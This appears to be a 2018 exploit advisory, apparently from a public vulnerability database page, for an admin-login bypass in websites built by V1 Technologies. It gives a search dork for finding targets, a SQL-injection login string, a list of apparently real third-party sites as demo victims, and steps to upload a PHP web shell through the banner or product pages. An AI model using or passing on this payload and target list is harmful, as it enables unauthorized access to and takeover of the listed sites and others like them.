v1technologies admin page bypass vulnerability

2018.09.15

nothing404.team (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-592

Dork: intext:"Mobile Friendly Web Design By: V1 Technologies Ltd"

####################################
# Exploit Title: v1technologies admin page bypass vulnerability
# Date: 2018-09-15
# Vendor Homepage: https://www.v1technologies.com/
# Exploit Author: nothing404.team
# Google Dork: intext:"Mobile Friendly Web Design By: V1 Technologies Ltd"
# Tested on: Kali Linux
####################################
admin page:
site.com/Site-Admin-V1/
exploit:
Username: '=''or'
password: '=''or'
Demo:
http://globalelec.co.in/Site-Admin-V1/
http://www.englishcountrybarn.co.uk/Site-Admin-V1/
http://excellous.biz//Site-Admin-V1/
http://www.indiaelec.com.sg/Site-Admin-V1/
https://www.sportspathwaycoaching.com//Site-Admin-V1/
http://progressivefootballacademy.com/Site-Admin-V1/
http://bossevents.co.in/Site-Admin-V1/
after login go to home -> Banner or Manage Products -> now you can uplaod shell
shell Path --> site.com/images/banner/yourshell.php
####################################
# ! We Are Nothing !
# nothing404.team@gmail.com
####################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

v1technologies admin page bypass vulnerability

Dork: intext:"Mobile Friendly Web Design By: V1 Technologies Ltd"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.